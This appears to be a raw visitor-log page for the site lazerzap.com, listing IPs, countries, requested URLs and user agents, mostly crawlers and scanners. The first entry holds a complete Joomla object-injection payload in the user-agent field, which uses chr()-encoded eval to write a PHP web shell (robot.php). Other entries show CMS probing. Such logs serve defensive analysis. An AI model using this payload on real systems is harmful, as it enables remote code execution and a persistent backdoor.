- 08:43 China 61.160.213.170 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://www.lazerzap.com Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/index.php?m=vote&c=index&a=post&subjectid=236&siteid=1 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.lazerzap.com/index.php?m=vote&c=index&a=post&subjectid=236&siteid=1 Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/index.php?m=vote&c=index&a=result&subjectid=236&siteid=1 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://www.lazerzap.com/index.php?m=vote&c=index&a=result&subjectid=236&siteid=1 Jul 09 - 09:01 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 09:04 Germany 85.10.201.122 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/69.0.3452.0 Safari/537.36 No Referrer Jul 10 - 09:37 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 10 - 09:48 United States 216.244.66.241 http://lazerzap.com/index.php/+/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 10 - 09:51 Sweden 151.252.29.88 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 09:53 Sweden 192.71.86.93 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2 No Referrer Jul 10 - 10:00 United States 207.46.13.96 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 10:22 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 11:08 China 202.100.179.141 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 10 - 11:08 China 202.100.179.141 http://lazerzap.com//index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.19.1 No Referrer Jul 10 - 11:08 China 202.100.179.141 http://lazerzap.com//index.php?s=/Core/File/uploadPictureBase64.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Unknown Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 No Referrer Jul 10 - 11:09 United States 54.36.148.113 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 11:27 Sweden 151.248.7.122 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 11:28 Sweden 194.103.92.191 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2 No Referrer Jul 10 - 11:31 China 111.206.36.8 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=humanhhw Jul 10 - 11:34 Russian Federation 46.161.9.50 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 http://lazerzap.com/ Jul 10 - 11:40 China 123.125.143.144 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=sceneafy Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:41 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 11:55 United States 207.46.13.96 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 11:57 Sweden 5.133.213.70 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2 No Referrer Jul 10 - 11:57 Sweden 5.133.213.70 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 11:57 Sweden 192.71.32.111 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/10.0.2 No Referrer Jul 10 - 12:03 Italy 164.132.211.193 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 10 - 12:13 Kazakhstan 5.34.72.148 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 http://lazerzap.com/ Jul 10 - 12:41 185.105.90.98 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 YaBrowser/17.10.0.2017 Yowser/2.5 Safari/537.36 https://lazerzap.com/ Jul 10 - 12:55 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.18.3 No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.18.3 No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.18.3 No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown python-requests/2.18.3 No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Linux Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2 No Referrer Jul 10 - 12:59 United States 18.191.240.153 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Linux Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2 No Referrer Jul 10 - 13:04 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 13:05 China 42.236.104.51 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 10 - 13:08 United States 157.55.39.180 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 13:34 United States 158.69.73.48 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 10 - 13:54 Russian Federation 77.88.47.24 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 10 - 13:54 Russian Federation 141.8.143.132 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 10 - 13:54 Russian Federation 5.255.250.123 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 10 - 14:06 United States 66.249.66.78 http://lazerzap.com/index.php?m=admin lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 14:14 Ukraine 159.224.41.137 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; Win64; rv:39.1) Gecko/20100101 Firefox/39.1 http://lazerzap.com/ Jul 10 - 14:36 Russian Federation 188.68.48.243 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 No Referrer Jul 10 - 14:36 Russian Federation 188.68.48.243 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 No Referrer Jul 10 - 14:53 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 14:56 China 180.76.15.16 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 10 - 16:51 United States 54.36.148.207 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 17:04 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 17:29 China 123.125.143.31 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=luckywqq Jul 10 - 17:35 China 123.125.71.98 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 10 - 17:40 Dominica 192.243.53.51 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 10 - 17:56 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 10 - 17:56 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 10 - 18:06 United States 40.77.167.38 http://www.lazerzap.com/index.php/component/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 10 - 18:06 United States 40.77.189.210 http://www.lazerzap.com/index.php/component/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b http://www.lazerzap.com/index.php/component/visitor_data.html Jul 10 - 18:06 United States 40.77.189.210 http://www.lazerzap.com/index.php/component/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b http://www.lazerzap.com/index.php/component/visitor_data.html Jul 10 - 18:06 United States 40.77.189.210 http://www.lazerzap.com/index.php/component/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b http://www.lazerzap.com/index.php/component/visitor_data.html Jul 10 - 18:06 United States 40.77.189.210 http://www.lazerzap.com/index.php/component/randomimages.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Unknown Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b http://www.lazerzap.com/index.php/component/visitor_data.html Jul 10 - 18:29 United States 54.157.139.224 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36 No Referrer Jul 10 - 18:31 United States 107.21.1.8 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com) http://www.lazerzap.com/ Jul 10 - 18:31 104.238.51.104 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 https://duckduckgo.com/ Jul 10 - 18:31 United States 54.157.139.224 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36 No Referrer Jul 10 - 18:49 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 19:09 United States 54.36.148.159 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 19:18 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 10 - 19:18 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 10 - 19:19 Switzerland 31.171.244.183 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 No Referrer Jul 10 - 19:33 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 10 - 19:54 United States 216.244.66.241 http://www.lazerzap.com/index.php/component/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 10 - 20:03 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 10 - 20:07 Viet Nam 42.119.117.155 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 No Referrer Jul 10 - 20:07 Viet Nam 42.119.117.155 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/44.0 No Referrer Jul 10 - 20:39 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 10 - 20:39 172.87.223.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 10 - 21:34 United States 216.244.66.241 http://www.lazerzap.com/index.php/component/users/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 10 - 21:57 United States 54.36.148.178 http://lazerzap.com/index.php/+/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 22:04 United States 54.36.149.44 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 10 - 22:11 United States 141.212.122.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 zgrab/0.x No Referrer Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 10 - 22:16 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 8.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 